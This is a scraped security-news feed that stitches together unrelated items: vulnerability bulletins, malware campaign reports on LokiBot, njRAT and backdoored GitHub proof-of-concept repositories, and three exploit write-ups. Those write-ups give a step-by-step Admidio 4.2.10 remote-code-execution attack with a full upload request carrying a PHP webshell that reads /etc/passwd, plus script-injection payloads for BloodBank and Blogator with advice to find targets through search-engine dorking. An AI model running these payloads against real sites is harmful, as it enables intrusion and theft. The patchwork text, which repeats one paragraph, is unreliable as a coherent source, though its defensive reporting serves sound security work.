Admidio version 4.2.10 suffers from a remote code execution vulnerability.

    Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)Application: AdmidioVersion: 4.2.10Bugs:  RCETechnology: PHPVendor URL: https://www.admidio.org/Software Link: https://www.admidio.org/download.phpDate of found: 10.07.2023Author: Mirabbas AğalarovTested on: Linux2. Technical Details & POC========================================Steps:1. Login to account2. Go to Announcements3. Add Entry4. Upload .phar file in image upload section..phar file Content<?php echo system('cat /etc/passwd');?>5. Visit .phar file  ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )Request:POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1Host: localhostContent-Length: 378Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=AnnouncementsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MBConnection: close------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="upload"; filename="shell.phar"Content-Type: application/octet-stream<?php echo system('cat /etc/passwd');?>------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="ckCsrfToken"o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB------WebKitFormBoundaryne9TRuC1tAqhR86r--

Admidio 4.2.10 Remote Code Execution

Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called LokiBot on compromised systems.
"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said. "It primarily targets Windows systems and aims to gather sensitive information from

Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called **LokiBot** on compromised systems.

"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said. "It primarily targets Windows systems and aims to gather sensitive information from infected machines."

The cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of CVE-2021-40444 and CVE-2022-30190 (aka Follina) to achieve code execution.

The Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot.

The injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment.

An alternative chain discovered towards the end of May starts with a Word document incorporating a VBA script that executes a macro immediately upon opening the document using the "Auto\_Open" and "Document\_Open" functions.

The macro script subsequently acts as a conduit to deliver an interim payload from a remote server, which also functions as an injector to load LokiBot and connect to a command-and-control (C2) server.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

LokiBot, not to be confused with an Android banking trojan of the same name, comes with capabilities to log keystrokes, capture screenshots, gather login credential information from web browsers, and siphon data from a variety of cryptocurrency wallets.

"LokiBot is a long-standing and widespread malware active for many years," Lin said. "Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims. The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware

CWE-502 Deserialization of Untrusted Data at the rabbitmq-connector plugin module in Apache EventMesh (incubating) V1.7.0\V1.8.0 on windows\linux\mac os e.g. platforms allows attackers to send controlled message and 

remote code execute via rabbitmq messages. Users can use the code under the master branch in project repo to fix this issue, we will release the new version as soon as possible.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-26512

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 with a Federated configuration is vulnerable to a stack-based buffer overflow, caused by improper bounds checking.  A local user with SYSADM privileges could overflow the buffer and execute arbitrary code on the system.  IBM X-Force ID:  257763.

  

**Summary**

IBM® Db2® with Federated configuration is vulnerable to arbitrary code execution as Db2 instance owner.

**Vulnerability Details**

**CVEID:**   CVE-2023-35012  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) with a Federated configuration is vulnerable to a stack-based buffer overflow, caused by improper bounds checking. A local user with SYSADM privileges could overflow the buffer and execute arbitrary code on the system.  
CVSS Base score: 6.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257763 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Applicable Editions

IBM® Db2®

11.5.7 with special build level before s2211170548.  The problem first fixed in s2211170548.

11.5.8 with special build level before s2211250928 .  The problem first fixed in s2211250928.

Server

All platforms are affected.  

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program,  V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  V11.5.7 and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V11.5

TBD

DT215550

Special Build for V11.5.7:

AIX 64-bit  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 64-bit, x86

Special Build for V11.5.8:

AIX 64-bit  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

10 Jul 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"}\],"Version":"11.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-35012: IBM® Db2® with Federated configuration is vulnerable to arbitrary code execution. (CVE-2023-35012)

Categories: News
Tags: week

Tags:  security

Tags:  July

Tags:  2023

A list of topics we covered in the week of July 10 to July 16 of 2023



(Read more...)




The post A week in security (July 10 - 16) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (July 10 - 16)

By Habiba Rashid
At the time of writing, all reported fake repositories have been taken down and the malicious PoC has been removed from GitHub.
This is a post from HackRead.com Read the original post: Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!

**The backdoor dropped in the scam had the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents.**

Cybersecurity researchers have uncovered a deceptive trend within the security community—a proof of concept (PoC) repository on **GitHub** that appears to address vulnerabilities but actually contains a hidden backdoor. The discovery by the Uptycs threat research team has raised concerns among the security research community.

PoCs are typically **used by researchers** to identify potential vulnerabilities through harmless testing. However, this malicious PoC operates as a downloader, disguising its activities as a kernel-level process while silently executing a Linux bash script. 

The backdoor has the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents. Moreover, by adding their SSH key to the authorized\_keys file, an attacker can achieve full control over a targeted system.

One of the fake profiles on GitHub that was used in spreading malicious PoCs (Image credit: Uptycs)

Here, Hackread.com can exclusively confirm that the image used in the above GitHub profile belongs to Shahriyar Hamid oghlu Mammadyarov, known internationally as **Shakhriyar Mamedyarov**, who is an Azerbaijani chess grandmaster. The profile image was stolen from a **blog post** and **a YouTube video** published by the popular Chess-related YouTube channel, ChessBase India.

The backdoor was discovered during the testing of PoCs for various Common Vulnerabilities and Exposures (CVEs) when the Uptycs team encountered a PoC claiming to address the critical vulnerability **CVE-2023-35829**. However, they detected several unusual activities that raised suspicions about the PoC’s legitimacy.

The suspicious behaviours encompassed unexpected network connections, abnormal data transfers, and unauthorized attempts to access the system. Further investigation revealed the significance of the “aclocal.m4” file, which required additional analysis.

The primary function of the binary file contains an interesting string, “kworker,” which plays a crucial role in the deception. The code checks if the binary is named “kworker” and performs specific actions accordingly, establishing **backdoor persistence** through file manipulation.

In their **report**, Nischay Hegde and Siddartha Malladi of the Uptycs Threat Research team wrote that the PoC used forking to create a new process, obscuring the original command line parameters. The parent process then executes the “curl\_func()” function, which downloads a URL containing a bash script. The script is executed if the curl request succeeds.

The fake PoC is a copy of a legitimate exploit for another Linux kernel vulnerability, **CVE-2022-34918**. It creates the illusion of being a root shell, exploiting differences in user namespaces to deceive users. However, the granted privileges are limited to the “/bin/bash” shell within a specific namespace.

Fake PocC (left) – Original PoC (right) – (Image credit: Uptycs)

Using Uptycs Extended Detection and Response (XDR), the binary’s behaviour was identified primarily as a downloader. It retrieves a script from a remote source and executes it on the compromised system. The downloaded script accesses the “/etc/passwd” file and modifies the “~/.ssh/authorized\_keys” file to grant unauthorized access and exfiltrates data using a specific URL.

This incident is not isolated; just last month, **it was reported that** several fake accounts on GitHub and Twitter were spreading malware in malicious PoC that infected both Windows- and Linux-based systems.

At the time of writing, ChriSander22’s repositories were taken down. Although the malicious PoC has also been removed from GitHub, it was widely shared, resulting in significant engagement before its true nature was exposed. Those who executed the PoC are at high risk of data compromise.

Therefore, it is crucial to take immediate action, including removing unauthorized SSH keys, deleting the “kworker” file, removing the kworker path from the “bashrc” file, and checking for potential threats in “/tmp/.iCE-unix.pid.”

**Malicious Repositories**

*   https://github.com/apkc/CVE-2023-35829-poc
*   https://github.com/ChriSanders22/CVE-2023-20871-poc/
*   https://github.com/ChriSanders22/CVE-2023-35829-poc/ (**archive link**)

Differentiating between legitimate and malicious PoCs can be challenging and security researchers are encouraged to adopt safe practices, such as conducting testing in isolated environments like virtual machines, to enhance protection against these **evolving cybersecurity risks**.

**RELATED ARTICLES**

1.  Crooks Targeting LinkedIn Users with Fake Profiles
2.  AI-Generated Images Used to Represent a Fake Law Firm
3.  Fake Facebook Profiles, Google Ads Pushing Sys01 Stealer
4.  Fake LinkedIn Job Offer Scam Hacked Off $625M from Axie Infinity
5.  Hackers Setup Fake Cyber Security Firm to Target InfoSec Experts

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!

An out-of-bounds write vulnerability in Bitdefender Engines on Windows causes the engine to crash. This issue affects Bitdefender Engines version 7.94791 and lower.

CVE-2023-3633

By Habiba Rashid
A fake and malicious version of TeamViewer is being pushed as legitimate, which in reality infects devices with njRAT Malware (aka Bladabindi).
This is a post from HackRead.com Read the original post: Fake TeamViewer Installer Used to Deliver njRAT Malware

**The njRAT malware is a remote access trojan that can perform malicious activities such as keylogging, password stealing, data exfiltration, accessing webcams and microphones, and downloading additional files, posing a significant threat to system privacy and security.**

In recent news, cybersecurity researchers have discovered that threat actors are utilizing the popular remote desktop support software, TeamViewer, as a delivery mechanism for the njRAT malware.

The **njRAT, also known as Bladabindi**, is a remote access trojan that poses a significant threat to the privacy, security, and integrity of affected systems.

The recent findings by Cyble Research & Intelligence Labs (CRIL) shed light on the deceptive tactics employed by threat actors to exploit the trust associated with well-known applications. By leveraging the widespread adoption of TeamViewer, as well as other legitimate tools like WireShark and Process Hacker, the threat actors deceive unsuspecting users into downloading and executing the malicious files.

The njRAT malware, **initially discovered in 2012-2013**, has primarily targeted organizations in Middle Eastern nations. This trojan is capable of carrying out a range of malicious activities, including keylogging, password stealing, data exfiltration, accessing webcams and microphones, and downloading additional files.

Upon closer **analysis**, CRIL researchers identified a 32-bit Smart Installer as the delivery mechanism for the njRAT malware. The installer drops two files in the Windows folder, one of which is the njRAT malware itself, while the other is a genuine TeamViewer application. This clever camouflage allows the malware to operate undetected within compromised systems.

Once executed, the installer triggers the **njRAT** malware and simultaneously launches the legitimate TeamViewer application, creating a deceptive user prompt window that requests the user to proceed with the TeamViewer installation. While the user believes they are installing legitimate software, the njRAT quietly conducts its malicious operations within the compromised system.

To ensure persistence, njRAT modifies system settings, including the “SEE\_MASK\_NOZONECHECKS” environment variable in the Windows registry, thereby bypassing security warning prompts. Additionally, it creates autorun entries in the system registry and copies itself to the startup directory, guaranteeing that it automatically runs every time the system boots up.

njRAT files in the Windows folder (Cyble)

The njRAT trojan also engages in keylogging, capturing keystrokes by utilizing a dedicated thread with continuous monitoring and storage of the captured data. It collects various system information and encodes it using the base64 encoding scheme for exfiltration.

The malware establishes a connection with a Command and Control (C&C) server to transmit the gathered information, awaiting instructions from the C&C server for further malicious actions. 

The exploitation of legitimate **software like TeamViewer** highlights the resourcefulness and adaptability of threat actors in spreading malware. Users must take precautionary measures to protect themselves from such attacks.

Recommendations include downloading tools and applications only from official websites, enabling automatic software updates, using reputable antivirus and internet security software, and exercising caution when opening untrusted links or email attachments.

1.  TeamViewer was Targeted by Chinese Hackers in 2016
2.  TeamSpy malware targeting users via malicious TeamViewer app
3.  Hackers targeting embassies with trojanized version of TeamViewer
4.  VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Fake TeamViewer Installer Used to Deliver njRAT Malware

BloodBank version 1.0 suffers from a cross site scripting vulnerability.

    ======================================================================================================================================| # Title     : BloodBank v1.0 - Blood Donor Directory CMS with PayPal Integration XSS Vulnerability                                 || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/bloodbank-blood-donor-directory-cms-with-paypal-integration/21188267                     |  | # Dork      : n/a                                                                                                                  |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload in search box: <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/demosly.om/xicia/cc/bloodbank/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BloodBank 1.0 Cross Site Scripting

Blogator version 0.93 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Blogator script v 0.93 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.blogator.net/                                                                                           |  | # Dork      : Weblogs par Blogator-script www.blogator-script.com © 2006 SAMTEK - Blogator                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : ?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3E[+] http://127.0.0.1//tst/?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows